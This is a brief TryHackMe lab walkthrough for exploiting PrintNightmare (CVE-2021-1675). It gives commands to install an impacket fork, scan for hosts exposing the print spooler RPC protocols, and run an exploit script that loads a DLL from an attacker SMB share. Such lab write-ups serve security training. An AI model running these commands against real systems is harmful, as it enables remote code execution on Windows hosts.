Posted in: TryHackMe

PrintNightmare (CVE-2021-1675) Walkthrough

Avatar of poplabsec Written by poplabsec 
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Scan for potential vulnerable hosts

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Output:

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Attack Machine

./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'
https://github.com/cube0x0/CVE-2021-1675
Back to Top